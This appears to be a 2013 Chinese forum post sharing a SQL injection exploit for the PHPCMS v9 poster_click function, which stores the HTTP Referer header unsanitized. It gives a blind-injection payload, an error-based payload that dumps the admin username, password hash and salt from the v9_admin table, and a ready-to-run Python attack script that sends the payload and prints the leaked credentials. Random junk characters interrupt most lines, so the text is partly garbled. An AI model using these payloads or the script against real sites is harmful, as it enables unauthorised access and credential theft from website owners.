有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式: j( @9 c- w5 @2 S- h
) L6 I& U) q3 n& ?6 h& k+ A' w# Q! R问题函数\phpcms\modules\poster\index.php& G" b/ U x/ h7 z: ~2 E
) u% k( ?; @' t4 x* npublic function poster_click() {5 v$ M0 w3 o) c) Q
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;( W5 ~8 w4 Z$ h ~' s- F& x9 W! g
$r = $this->db->get_one(array('id'=>$id));
' g/ B" f; I2 M9 lif (!is_array($r) && empty($r)) return false;
! |2 M% I' d8 i, w$ip_area = pc_base::load_sys_class('ip_area');
% ^4 x7 B/ K+ D) u" U0 l7 X* m$ip = ip();
; q \$ G) c! d+ A$area = $ip_area->get($ip);
( Q& Y9 s2 |# |$ {- x6 J; x1 u$username = param::get_cookie('username') ? param::get_cookie('username') : '';! P9 v3 S2 I1 W! V
if($id) {8 z9 w# z' G5 q6 n4 K7 X0 M6 E
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
$ k% O& T, R/ I& ]1 X; m2 H2 ]! S8 L$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));) p) V) T' S- p$ M$ ~
}% q& ~" Y7 t: w1 r* g
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
" V6 ~, Z6 m: ?6 q( F0 f4 g8 H$setting = string2array($r['setting']);% h2 o) }% _& @, X! O5 F: H4 i
if (count($setting)==1) {
! L9 L% E- g/ H$url = $setting['1']['linkurl'];
5 M8 S9 Z$ e n& v8 A! g} else {
: `0 L8 @- `4 ]) d$ X- U$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];- L7 v2 l* M, j" T6 E
}+ e* N1 ~1 K' N; O# V6 \# D
header('Location: '.$url);+ h. `9 R/ m+ @# g
}
" a8 q) x1 j2 c4 c6 B
* c7 M& e9 ?4 k9 N5 W
- \% v5 L% I) o H. r1 P$ O. Y; p* ~. Q: ?
利用方式:+ D3 U4 R+ |" H3 @' ?: Y+ I
$ f1 _$ H% Y! l& c6 v, a4 G; Z3 i
1、可以采用盲注入的手法:
; ?. h" d, |- a& l$ @
; \( p4 }2 h2 P( k( C( A) ~, areferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#1 }# ^8 M/ G9 O
7 b" O- ^6 V0 k X M3 q$ S
通过返回页面,正常与否一个个猜解密码字段。; X) K& ]! f* z1 s3 n
/ E, V. g/ v- ~/ F2、代码是花开写的,随手附上了:
1 m X- {* N& O2 g# n) \3 j0 p: x# Q4 w2 }/ n
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#/ ^3 c" P7 K1 j( o* b, z
# }8 a3 B4 g0 a$ ^4 k
此方法是爆错注入手法,原理自查。
' e8 R3 R8 q# G, l2 o3 h9 K. W7 C# W5 _0 Y
+ G$ F) ^# ]: L7 y; l$ E$ q, |
+ N* _% V/ e/ d, h# |利用程序:& [3 Y: v1 s" s( b5 o8 ]2 T
3 B3 C! V4 s9 c0 `& X1 k
#!/usr/bin/env python% I# T$ v8 w% f+ n V5 S
import httplib,sys,re
! g1 u: V2 }8 x( U6 `, x0 p( J$ h/ j6 m* H3 Y( q4 v' _
def attack():
+ V' s7 E% G- H' o7 H6 }print “Code by Pax.Mac Team conqu3r!”
# R [+ _4 D5 T0 ^1 Zprint “Welcome to our zone!!!”3 I5 X6 C* W- @( k
url=sys.argv[1]0 h+ H6 w0 c F1 B' w4 y% R+ W
paths=sys.argv[2]
3 ~" V4 z, e( P+ P+ @8 ?conn = httplib.HTTPConnection(url)
X. `3 M2 c& j' v7 F1 Oi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,/ _: k8 S2 k( q L0 i5 O/ q
“Accept”: “text/plain”,, l5 g# @2 i L
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}$ c; @8 t" @5 k3 Q; I" h* B& C
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
/ k* _; r8 a8 d2 q& er1 = conn.getresponse()
, e4 d. a2 X% q+ o; x ndatas=r1.read()
3 ^6 n/ ~' f2 tdatas=re.findall(r”Duplicate entry \’\w+’”, datas)
% X, m1 i% G! }' T' zprint datas[0]# d! g0 z9 |' s0 {0 h; b
conn.close()! V5 n' }+ m, U! u1 T7 w
if __name__==”__main__”:6 N; ]9 }+ G$ G0 a+ I
if len(sys.argv)<3:1 z4 w' @ p1 X' r' N. G; e
print “Code by Pax.Mac Team conqu3r”
, r l- L4 [; g2 P* Fprint “Usgae:”
, ~) D, @& L2 ~0 ^. ~9 z9 f2 Aprint “ phpcmsattack.py www.paxmac.org /”
2 P: d' @* d* Vprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
9 S* @# A2 Q+ M2 r, ]8 [sys.exit(1)$ `8 m2 D. o, Y O, ^
attack()/ R! Q5 u4 \, J; [0 X/ m
! E' K( e O+ ] V# ]# ? |
发表于 2013-1-11 21:01:00
收藏
支持
反对